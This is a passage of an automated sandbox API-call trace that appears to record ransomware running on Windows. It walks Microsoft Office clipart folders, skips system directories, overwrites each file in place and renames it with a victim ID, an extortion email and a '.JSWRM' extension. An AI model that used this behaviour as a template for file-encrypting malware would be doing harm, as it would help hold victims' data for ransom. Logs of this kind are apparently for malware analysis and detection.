office\\root\\clipart\\pub60cor\\in00957_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.354] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2944) returned 1 [0079.354] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb80) returned 0x23fc98 [0079.354] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb80, lpOverlapped=0x0) returned 1 [0079.359] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.359] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb80, lpOverlapped=0x0) returned 1 [0079.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.359] CloseHandle (hObject=0x314) returned 1 [0079.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0079.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0079.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0079.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0079.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0079.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.359] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00957_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00957_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0079.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.360] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe00f20a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2178, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="INDST_01.MID", cAlternateFileName="")) returned 1 [0079.360] lstrcmpiW (lpString1="INDST_01.MID", lpString2=".") returned 1 [0079.360] lstrcmpiW (lpString1="INDST_01.MID", lpString2="..") returned 1 [0079.360] lstrcmpiW (lpString1="INDST_01.MID", lpString2="...") returned 1 [0079.360] lstrcmpiW (lpString1="INDST_01.MID", lpString2="windows") returned -1 [0079.360] lstrcmpiW (lpString1="INDST_01.MID", lpString2="recovery") returned -1 [0079.360] lstrcmpiW (lpString1="INDST_01.MID", lpString2="perflogs") returned -1 [0079.360] lstrcmpiW (lpString1="INDST_01.MID", lpString2="documents and settings") returned 1 [0079.360] lstrcmpiW (lpString1="INDST_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0079.360] lstrcmpiW (lpString1="INDST_01.MID", lpString2="system volume information") returned -1 [0079.360] lstrcmpiW (lpString1="INDST_01.MID", lpString2="msocache") returned -1 [0079.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0079.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INDST_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INDST_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INDST_01.MID", lpUsedDefaultChar=0x0) returned 12 [0079.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0079.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0079.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INDST_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INDST_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INDST_01.MID", lpUsedDefaultChar=0x0) returned 12 [0079.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0079.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0079.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.361] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8568) returned 1 [0079.361] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2170) returned 0x205850 [0079.361] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2170, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2170, lpOverlapped=0x0) returned 1 [0079.365] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.365] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2170, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2170, lpOverlapped=0x0) returned 1 [0079.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.365] CloseHandle (hObject=0x314) returned 1 [0079.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0079.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0079.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0079.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0079.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0079.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.366] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0079.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.367] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe00f20a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0075478.GIF", cAlternateFileName="")) returned 1 [0079.367] lstrcmpiW (lpString1="J0075478.GIF", lpString2=".") returned 1 [0079.367] lstrcmpiW (lpString1="J0075478.GIF", lpString2="..") returned 1 [0079.367] lstrcmpiW (lpString1="J0075478.GIF", lpString2="...") returned 1 [0079.367] lstrcmpiW (lpString1="J0075478.GIF", lpString2="windows") returned -1 [0079.367] lstrcmpiW (lpString1="J0075478.GIF", lpString2="recovery") returned -1 [0079.367] lstrcmpiW (lpString1="J0075478.GIF", lpString2="perflogs") returned -1 [0079.367] lstrcmpiW (lpString1="J0075478.GIF", lpString2="documents and settings") returned 1 [0079.367] lstrcmpiW (lpString1="J0075478.GIF", lpString2="$RECYCLE.BIN") returned 1 [0079.367] lstrcmpiW (lpString1="J0075478.GIF", lpString2="system volume information") returned -1 [0079.367] lstrcmpiW (lpString1="J0075478.GIF", lpString2="msocache") returned -1 [0079.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0079.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0075478.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0075478.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0075478.GIF", lpUsedDefaultChar=0x0) returned 12 [0079.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0079.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0079.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0075478.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0075478.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0075478.GIF", lpUsedDefaultChar=0x0) returned 12 [0079.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0079.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0079.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0075478.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.368] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1220) returned 1 [0079.368] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4c0) returned 0x230a00 [0079.368] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x4c0, lpOverlapped=0x0) returned 1 [0079.369] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.369] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x4c0, lpOverlapped=0x0) returned 1 [0079.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0079.369] CloseHandle (hObject=0x314) returned 1 [0079.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0079.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0079.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0079.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0079.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0079.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.370] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0075478.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0075478.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0079.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.371] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2606, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0086384.WMF", cAlternateFileName="")) returned 1 [0079.371] lstrcmpiW (lpString1="J0086384.WMF", lpString2=".") returned 1 [0079.371] lstrcmpiW (lpString1="J0086384.WMF", lpString2="..") returned 1 [0079.371] lstrcmpiW (lpString1="J0086384.WMF", lpString2="...") returned 1 [0079.371] lstrcmpiW (lpString1="J0086384.WMF", lpString2="windows") returned -1 [0079.371] lstrcmpiW (lpString1="J0086384.WMF", lpString2="recovery") returned -1 [0079.371] lstrcmpiW (lpString1="J0086384.WMF", lpString2="perflogs") returned -1 [0079.371] lstrcmpiW (lpString1="J0086384.WMF", lpString2="documents and settings") returned 1 [0079.371] lstrcmpiW (lpString1="J0086384.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.371] lstrcmpiW (lpString1="J0086384.WMF", lpString2="system volume information") returned -1 [0079.371] lstrcmpiW (lpString1="J0086384.WMF", lpString2="msocache") returned -1 [0079.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0079.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086384.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086384.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086384.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0079.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0079.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086384.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0086384.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0086384.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0079.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086384.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.372] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9734) returned 1 [0079.372] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2600) returned 0x24d210 [0079.372] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2600, lpOverlapped=0x0) returned 1 [0079.374] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.374] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2600, lpOverlapped=0x0) returned 1 [0079.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.378] CloseHandle (hObject=0x314) returned 1 [0079.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.378] MultiByteToWideChar (in: 